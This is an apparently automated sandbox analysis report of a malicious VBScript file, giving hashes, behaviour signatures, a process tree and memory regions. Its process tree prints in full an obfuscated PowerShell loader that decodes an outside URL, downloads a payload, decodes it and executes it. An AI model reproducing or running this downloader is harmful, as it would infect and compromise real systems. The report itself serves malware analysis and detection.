Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    15/02/2024, 05:40

General

  • Target

    d0fceb6bb0ed4dc5b8601e9560a291fe726958c774b0dc8647d1b7aec3f0c84c.vbs

  • Size

    93KB

  • MD5

    79094e9847a7bf1ffd13972fd7f4fe9f

  • SHA1

    98d0d34a146712d3399fcacf2369e11c4cd9c4ea

  • SHA256

    d0fceb6bb0ed4dc5b8601e9560a291fe726958c774b0dc8647d1b7aec3f0c84c

  • SHA512

    e0399f4fe05cdbc25dc193142d017d1161adb049cfd82dce26c03054f52825c43964b30c6c189cc293c85fb5f6da1092e62cfc736072294be62c23463a8386a9

  • SSDEEP

    1536:HJglU0P4wDaWxyADV76w2bnQReOlDaP5QrIWG2CSAe0i4rEOz+d:pglnvD1xyAp761kRe8DaP54G3eL4rvyd

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d0fceb6bb0ed4dc5b8601e9560a291fe726958c774b0dc8647d1b7aec3f0c84c.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2176
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#bawsuntti Preterien Dkfjernon Slavehandl #>;$Ellagate=(cmd /c set /A 115^^0);Function Cyklis197 ([String]$Fakkelto){$Ellagate=[char][int]$Ellagate;$Udvidelser=$Ellagate+'ubstring';$Darghinho=8;$disbrainw=Elipser4($Fakkelto);For($Betjenbly=7; $Betjenbly -lt $disbrainw; $Betjenbly+=$Darghinho){$Blabb=$Fakkelto.$Udvidelser.Invoke($Betjenbly, 1);$Elipser=$Elipser+$Blabb;}$Elipser;}function Sikkerh ($Milj93){& ($Elipser01) ($Milj93);}function Elipser4 ([String]$Gosp){$ocaadrena1=$Gosp.Length-1;$ocaadrena1;}$Elipser02=Cyklis197 'HeptadeT KrybenrAbhorsoaIlluminn AntistsSkvtsglfMentioneTilskynr benfrirTjaldsbi PerukenSleevedgDansemu ';$Packt=Cyklis197 'Ddemandhtremolot SuprastRectangpmellemgsOvertag:Parader/ Flacke/ScaphogsLkkestrcOverheaaFrsemasiSprinklntilslutsLindbereOvertimt BotchioForttni.WeakytrcConcento SubsammMorallr.IbrugtabSkonnerrEbdomad/TilbagewManatinpRensnin-Ekspatra mennesdDesultomBorolibiKusamren Monome/ NashaacChromatyUndecoycHanefjelDelirioosolfangtDvrgkonh NeglecuCospons.FluidicpDansantfNarratemBilleda ';$Elipser01=Cyklis197 'Beredeli LeasineRepressxHandlin ';$Elipser00=Cyklis197 'Neathmo$LactonigKonfisklPolyestoAnmeldebInterioahovedstl Folkso:PengepooFaseindcBecausea FuzegeaIntrodud mezcalrFerskvae KameranEmbryopaForuren8Smuglma Endoper=Hexagyn HildegaSBldtvant AptalvaFedepserNoncoagtIsaianw-afformaBCryoplaiTilbjelt DispossBrdfabrT Holopar GrasseaHeartbrn LuteolsQuitchefNitrateeNegerborhilltop Finansb-VarigheSnedrakkoKologituShoplifrSphyrnicStvkonse Sllern Ecchbla$ BortpeP OzzieoaUndersecStenogakAfrasiatBoldfac Genspej-ElelfenDBrinishePropagasRivetndtkaffirsiElectranCalceusaCupelertcorbicui AlricgoFredskonKnaveri Pretes$OptjeneoTsubokoc Fastbaa JerntnaCardiecdUlykkesrRedialleSomitalnEmbatheaBegaudc2Aproned ';Sikkerh (Cyklis197 'autodkk$Autorisg herrerlNonopproPostnumb Cordiaa HentehlFilialn:NonprotoOvervrecFortyskaAmphithaSpeditidHormonorTetraloe CharcinRugegspadilatom2jugland=Scleren$GluedbaeGeneralnExpellevBrystsv:ElytrinaStenkulp Dupperp ConfirdAfledniaDiamondt samalqaInstruk ') ;Sikkerh (Cyklis197 'GeneralISkraldsmmillionpVsentlioWafthyprBandagetKulturc- HvisaaMOmbetrkoSlidtsodVrksteduStrandklheltalseLittera EsthacyBRenegotiModerkat plenums SpartlTkogechorUlvebloa AcinetnTakahessLeverinfVomitore GasterrJohnydo ') ;$ocaadrena2=$ocaadrena2+'\Taksati.kon' ;Sikkerh (Cyklis197 ' Comedy$DriftskgMedarbelPaabegyo LagerabUnscornaRadiiunl Pedant:Denimmeo SammencKlanglsaWhistlea HvidvidEksplosrVidaabne NonnatnetologiaJetesbe7 clappe=Agtsomm(RottefnTurostifeUbestvesWavelestHaandkl-SupermoP TestfiaBhmernetForhaanhPromode Svinghj$ GodmotoAcetomecErhverva TenebraAvissaldSindsstrOdorleseEikefifnTekstkraLsersmu2Ecandac)Pandehu ') ;while (-not $ocaadrena7) {Sikkerh (Cyklis197 ' GringeIFarvehafAristok Shampon(Salting$congessoDepravecDerommeaIndpakkaConubiudInsultpr SociomeVanskbnnUndergiaMontmor8 admira.VandprvJBygningoCatkinabStrykniSParsonotBrachygaKongerntBrunerieGatekee Manpack-KhevzureUnmuddlq Tauten Sidelin$UngorgeEAtionsplWoolliniVerdensp Clystes StartbeSpaniperSkraapa0 Smashe2Kartote)Oozoali Oblataa{ NvnermS RygepatFjernstaForhandrBookbintResumee-TantaraSResterelBlazereeLiturgieVrdimngpToxalbu Overtop1Blandin}Outparae UnderflHovednrspiggybae Rivalr{SigteevSTotemittSterlinaTsenesmrPatchwotStatefu- TypeabSTranslalStrattoeTidsskreForsikrpNivella Perspir1 Wacksy; DisjasSTabelopiMutinyskCognizekSlutbete SkrmharLuftbaah Nogged Broerun$VekselvEHarebotlPjokkedi MelanepBortledsMasticie FlokinrOpkobli0Fdevare0Paltril}Osophon ');Sikkerh (Cyklis197 'Yokcliq$OutswingOrwellslPhlogisoMantappb positiaVgrerthlAccosts:NonodoroTiredomcbrugtbaaTilbjelaUnsatisdsystemirPegasuse DivisinBenchwoaAdminis7Keglere=Blindga(BiotechTFlgestneOplsendsPretraitTumbleh-ShipmanP Cephala NetadrtMetacenhbrnesen Arkite$ExplanaoNotatiocSemificaCervicoa clintidOtiliefrScrollbe LuftfanGasovnea Python2Zephani)Anslags ') ;}Sikkerh (Cyklis197 'Winnowe$KrftenlgForklarlJuanitaoTransanbRudimenaNormskolEkstrak:DeodoriNBellwineDelatindBilledsj Saviou1Stereot7Folketi4Bajonet Forveks=Diamond UmisforG havegae Autoset Frugtk-PustuleCCrissumoAltercan AftrkktSexageseBrandlonSyrligstGuidebo Trolse$Technolo CiselecScanninaKursnedaFaqlowedInevitarKursvrdeUnbandanagribusaTirrede2Skriben ');Sikkerh (Cyklis197 'Transce$SensommgEngrosblKnibtano BlgedabUnexhumaDekoratlUundvig:ScranneD FordrveSnowshoa LandflcPadesoyoIndubitnXylinde Rundesa=Frdiggr Wellcur[ touchlSMjesuniyTankesys IhjelptFangstbenskeformHairspr.PrinterCFnikerno RevisonViolentvCoefficeHalvlegr Friscot Enneas]Ripplet:Ensilag:MetrikkFProbattrBlaffero serailm YoghurBMattereaKnledsmsPishhoveAdvisor6studhor4 FalsumSOmhyggetUnshipsrVidvinkiStramtsn myoprogNdvrget( Grinag$ PreabuNMiskmaseBlystbeddiurnuljShamans1Pottosf7Apanage4Berteli)Villale ');Sikkerh (Cyklis197 ' Levuli$VaricocgUnisonalUnexpecoGutsybub PantalaStringclCobbies:InconelEcomputelKilocaliCradlerpdormitosForespeeSwissesrAchines2Indavle Preserv=Toxinea Devalue[DecapetSYmtertryProfounsIndkrvnt BruttoeTilspurmPathbre.SubantiT emboweeOtteaarxCentraltDepende.FarvemsEFallernnAgertidcObtempeoBurielsdDramatiiTodagesnManipulg Riglin]Anhnger:Sorings:afledteA FootraSTrallevCHessparIEmbarquISirupyk.OclocktG Vemodoe PuffedtPhonetiSSplotchtGevirscrDoctrini JohnsenGennemsgSubvers(Gavflab$SektionDGrammateTriboloaSnurpencExpireuoManiocan Proful)Cathept ');Sikkerh (Cyklis197 'ophnges$BogtrykgdunlinblEbonizeoSuccessbResonera Fejltil kuankl: JannsgE PumperlStrepsii SomedepRhythmisAmphigoe PartiorHjertes3Demokra=Skoalin$ReemigrEStewardlFisedesigulnarepProduktsQuadpleeSekunderSovietc2 produk.EurekafsSnippetuReprsenbDermatosAdelsmatAtomknurSammenbiVittussnMurstengDiffusi(skeyhel3 Fordyb0Mercypr9Prosely8Geograf8Abcerne6Begynde,Unallit2 Niases4Beatusp1Udmaler6Exorciz0Quiresh)Asylans ');Sikkerh $Elipser3;"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2156
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c set /A 115^^0
        3⤵
          PID:2356

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • memory/2156-4-0x000000001B390000-0x000000001B672000-memory.dmp

            Filesize

            2.9MB

          • memory/2156-5-0x000007FEF55F0000-0x000007FEF5F8D000-memory.dmp

            Filesize

            9.6MB

          • memory/2156-7-0x0000000002A90000-0x0000000002B10000-memory.dmp

            Filesize

            512KB

          • memory/2156-6-0x0000000002110000-0x0000000002118000-memory.dmp

            Filesize

            32KB

          • memory/2156-8-0x000007FEF55F0000-0x000007FEF5F8D000-memory.dmp

            Filesize

            9.6MB

          • memory/2156-9-0x0000000002A90000-0x0000000002B10000-memory.dmp

            Filesize

            512KB

          • memory/2156-10-0x0000000002A90000-0x0000000002B10000-memory.dmp

            Filesize

            512KB

          • memory/2156-11-0x0000000002A90000-0x0000000002B10000-memory.dmp

            Filesize

            512KB

          • memory/2156-12-0x00000000027F0000-0x0000000002812000-memory.dmp

            Filesize

            136KB

          • memory/2156-13-0x0000000002540000-0x0000000002552000-memory.dmp

            Filesize

            72KB

          • memory/2156-14-0x000007FEF55F0000-0x000007FEF5F8D000-memory.dmp

            Filesize

            9.6MB

          • memory/2156-15-0x0000000002A90000-0x0000000002B10000-memory.dmp

            Filesize

            512KB

          • memory/2156-16-0x000007FEF55F0000-0x000007FEF5F8D000-memory.dmp

            Filesize

            9.6MB

          • memory/2156-17-0x0000000002A90000-0x0000000002B10000-memory.dmp

            Filesize

            512KB

          • memory/2156-18-0x0000000002A90000-0x0000000002B10000-memory.dmp

            Filesize

            512KB

          • memory/2156-19-0x0000000002A90000-0x0000000002B10000-memory.dmp

            Filesize

            512KB